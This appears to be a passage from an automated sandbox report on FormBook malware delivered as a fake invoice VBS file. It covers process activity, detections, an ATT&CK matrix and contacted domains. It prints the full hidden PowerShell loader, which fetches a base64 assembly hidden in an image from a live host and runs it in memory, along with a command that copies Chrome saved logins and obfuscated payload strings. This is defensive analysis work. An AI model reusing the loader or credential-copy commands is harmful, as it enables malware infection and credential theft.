wBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('wbugp6qysf58ija!=yekhtua&21112%08168c3c4f36f6e4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtreJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('wbugp6qysf58ija!=yekhtua&21112%08168c3c4f36f6e4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }"Jump to behavior
            Source: explorer.exe, 00000006.00000002.2934424185.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790340011.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2931838474.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.1790340011.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2931838474.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000006.00000002.2931305146.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
            Source: explorer.exe, 00000006.00000000.1790340011.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2931838474.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000006.00000000.1790340011.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2931838474.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_000E1975 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,8_2_000E1975
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts1
            Shared Modules            		221
            Scripting            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		712
            Process Injection            		4
            Obfuscated Files or Information            		1
            Credential API Hooking            		2
            File and Directory Discovery            		Remote Desktop Protocol1
            Data from Local System            		4
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter            		1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		1
            Software Packing            		Security Account Manager114
            System Information Discovery            		SMB/Windows Admin Shares1
            Email Collection            		11
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Scheduled Task/Job            		Login HookLogin Hook1
            DLL Side-Loading            		NTDS121
            Security Software Discovery            		Distributed Component Object Model1
            Credential API Hooking            		4
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts3
            PowerShell            		Network Logon ScriptNetwork Logon Script1
            Rootkit            		LSA Secrets2
            Process Discovery            		SSHKeylogging15
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
            Virtualization/Sandbox Evasion            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job712
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428347 Sample: Signed Proforma Invoice 364... Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 53 www.xasvcd.xyz 2->53 55 paste.ee 2->55 57 14 other IPs or domains 2->57 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Antivirus detection for URL or domain 2->81 87 13 other signatures 2->87 13 wscript.exe 14 2->13         started        signatures3 83 Performs DNS queries to domains with low reputation 53->83 85 Connects to a pastebin service (likely for C&C) 55->85 process4 dnsIp5 63 paste.ee 172.67.187.200, 443, 49730 CLOUDFLARENETUS United States 13->63 113 System process connects to network (likely due to code injection or exploit) 13->113 115 VBScript performs obfuscated calls to suspicious functions 13->115 117 Suspicious powershell command line found 13->117 119 5 other signatures 13->119 17 powershell.exe 7 13->17         started        signatures6 process7 signatures8 73 Suspicious powershell command line found 17->73 75 Found suspicious powershell code related to unpacking or dynamic code loading 17->75 20 powershell.exe 14 15 17->20         started        24 conhost.exe 17->24         started        process9 dnsIp10 59 uploaddeimagens.com.br 104.21.45.138, 443, 49731, 49732 CLOUDFLARENETUS United States 20->59 61 dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49733 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 20->61 97 Writes to foreign memory regions 20->97 99 Injects a PE file into a foreign processes 20->99 26 MSBuild.exe 20->26         started        29 MSBuild.exe 20->29         started        signatures11 process12 signatures13 103 Modifies the context of a thread in another process (thread injection) 26->103 105 Maps a DLL or memory area into another process 26->105 107 Sample uses process hollowing technique 26->107 109 Queues an APC in another process (thread injection) 26->109 31 explorer.exe 30 1 26->31 injected 111 Tries to detect virtualization through RDTSC time measurements 29->111 process14 dnsIp15 65 www.xasvcd.xyz 203.161.57.217, 49743, 80 VNPT-AS-VNVNPTCorpVN Malaysia 31->65 67 www.msaway.com 217.160.0.95, 49740, 49742, 80 ONEANDONE-ASBrauerstrasse48DE Germany 31->67 69 lunazone.us 3.33.130.190, 49744, 80 AMAZONEXPANSIONGB United States 31->69 71 System process connects to network (likely due to code injection or exploit) 31->71 35 colorcpl.exe 18 31->35         started        signatures16 process17 file18 47 C:\Users\user\AppData\...\J4Llogrv.ini, data 35->47 dropped 49 C:\Users\user\AppData\...\J4Llogri.ini, data 35->49 dropped 89 Detected FormBook malware 35->89 91 Tries to steal Mail credentials (via file / registry access) 35->91 93 Tries to harvest and steal browser information (history, passwords, etc) 35->93 95 5 other signatures 35->95 39 cmd.exe 2 35->39         started        43 firefox.exe 35->43         started        signatures19 process20 file21 51 C:\Users\user\AppData\Local\Temp\DB1, SQLite 39->51 dropped 101 Tries to harvest and steal browser information (history, passwords, etc) 39->101 45 conhost.exe 39->45         started        signatures22 process23

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Signed Proforma Invoice 3645479_pdf.vbs8%ReversingLabsWin32.Dropper.Generic

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crl.microsoft0%URL Reputationsafe
            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
            https://mozilla.org0/0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://schemas.micr0%URL Reputationsafe
            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%URL Reputationsafe
            https://outlook.com_0%URL Reputationsafe
            http://schemas.mi0%URL Reputationsafe
            https://powerpoint.office.comcember0%URL Reputationsafe
            http://schemas.micro0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            lunazone.us
            		3.33.130.190
            		truetrue
              		unknown
              dual-spov-0006.spov-msedge.net
              		13.107.139.11
              		truefalse
                		unknown
                bg.microsoft.map.fastly.net
                		199.232.210.172
                		truefalse
                  		unknown
                  www.msaway.com
                  		217.160.0.95
                  		truetrue
                    		unknown
                    paste.ee
                    		172.67.187.200
                    		truefalse
                      		high
                      uploaddeimagens.com.br
                      		104.21.45.138
                      		truetrue
                        		unknown
                        www.xasvcd.xyz
                        		203.161.57.217
                        		truetrue
                          		unknown
                          fp2e7a.wpc.phicdn.net
                          		192.229.211.108
                          		truefalse
                            		unknown
                            www.lunazone.us
                            		unknown
                            		unknowntrue
                              		unknown
                              onedrive.live.com
                              		unknown
                              		unknownfalse
                                		high
                                htdgia.db.files.1drv.com
                                		unknown
                                		unknownfalse
                                  		high
